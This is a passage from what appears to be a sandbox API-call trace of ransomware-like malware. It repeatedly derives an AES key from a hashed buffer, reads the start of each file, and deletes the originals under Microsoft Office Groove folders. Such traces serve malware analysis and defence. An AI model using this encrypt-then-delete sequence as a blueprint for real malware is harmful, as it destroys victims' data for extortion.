(hProv=0xa52810, dwFlags=0x0) returned 1 [0164.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimages.jpg")) returned 1 [0164.614] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.615] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.615] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.615] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.615] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5a4 [0164.615] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.626] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.626] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.626] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.627] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp")) returned 1 [0164.628] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.629] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.629] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.629] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.629] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0164.629] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.630] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.630] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.630] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\_help.txt")) returned 1 [0164.632] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0164.646] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.646] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.646] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.646] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.646] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe1b [0164.646] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.670] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.670] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.670] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.671] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericon.jpg")) returned 1 [0164.672] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.672] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.672] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.673] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.673] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x838 [0164.673] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.709] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.709] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.709] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp")) returned 1 [0164.711] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0164.713] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.714] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.714] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.714] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.714] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x393c [0164.714] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.781] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.781] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.781] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.781] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimages.jpg")) returned 1 [0164.783] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.783] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.783] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.783] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.783] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1738 [0164.783] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.802] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.802] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.802] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.803] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimagesmask.bmp")) returned 1 [0164.804] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0164.805] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.805] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.805] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.805] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.805] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xab11 [0164.805] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.810] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.810] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.810] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\WSSFilesToolHomePageBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\wssfilestoolhomepagebackground.jpg")) returned 1 [0164.835] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0164.835] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.836] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.836] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.836] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.836] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2519 [0164.836] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.843] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.843] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.843] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.844] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\activetabimage.jpg")) returned 1 [0164.855] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.856] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.856] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.856] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.856] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xca8 [0164.856] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.865] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.865] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.865] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\ActiveTabImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\activetabimagemask.bmp")) returned 1 [0164.867] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.868] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.868] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.868] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.868] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9bd [0164.868] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.874] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.874] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.874] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\BodyPaneBackground.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\bodypanebackground.jpg")) returned 1 [0164.887] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.888] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.888] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.888] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.888] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24ed [0164.888] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.896] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.896] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.896] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimage.jpg")) returned 1 [0164.899] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.899] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.899] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.899] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.899] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xca8 [0164.899] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.908] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.908] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.908] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimagemask.bmp")) returned 1 [0164.911] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.911] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.911] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.911] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.911] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x98b [0164.911] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.917] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.917] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.917] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.918] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimages.jpg")) returned 1 [0164.919] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.920] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.920] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.920] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.920] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74 [0164.920] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x74, lpOverlapped=0x0) returned 1 [0164.921] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.921] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.921] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.924] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimagesmask.bmp")) returned 1 [0164.935] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0164.937] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.938] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.938] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.938] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.938] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe8 [0164.938] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.951] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.951] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.951] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.953] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\addtoviewarrow.jpg")) returned 1 [0164.954] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.954] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.954] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.954] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.954] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x924 [0164.955] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.957] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0164.957] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.957] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\AddToViewArrowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\addtoviewarrowmask.bmp")) returned 1 [0164.959] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.960] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.960] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.960] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.960] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xae8 [0164.960] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.972] CryptDestroyHash (hHash=0x284d628) returned 1 [0164.972] CryptDestroyKey (hKey=0x284d668) returned 1 [0164.972] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0164.973] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\attention.gif")) returned 1 [0164.975] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0164.975] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0164.975] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.975] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0164.975] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161d [0164.975] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0164.978] CryptDestroyHash 